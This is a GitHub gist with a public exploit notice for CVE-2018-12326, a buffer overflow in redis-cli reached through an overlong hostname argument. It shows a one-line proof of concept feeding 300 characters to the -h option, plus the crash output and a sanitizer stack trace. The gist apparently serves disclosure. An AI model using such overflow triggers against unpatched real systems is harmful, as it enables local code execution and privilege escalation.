Last active
March 18, 2022 04:31
-
-
Save fakhrizulkifli/f831f40ec6cde4f744c552503d8698f0 to your computer and use it in GitHub Desktop.
CVE-2018-12326
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Redis-cli Buffer Overflow | |
# Date: 2018-06-13 | |
# Exploit Author: Fakhri Zulkifli (@d0lph1n98) | |
# Vendor Homepage: https://redis.io/ | |
# Software Link: https://redis.io/download | |
# Version: 5.0, 4.0, 3.2 | |
# Fixed on: 5.0, 4.0, 3.2 | |
# CVE : CVE-2018-12326 | |
Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker to achieve code execution and escalate to higher privileges via a long string in the hostname parameter. | |
$ ./src/redis-cli -h `python -c 'print "A" * 300'` | |
Could not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known | |
#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566 | |
#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637 | |
#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5 | |
#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9 | |
#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 | |
#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8) | |
References: | |
1. https://raw.githubusercontent.com/antirez/redis/4.0/00-RELEASENOTES | |
2. https://raw.githubusercontent.com/antirez/redis/5.0/00-RELEASENOTES |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment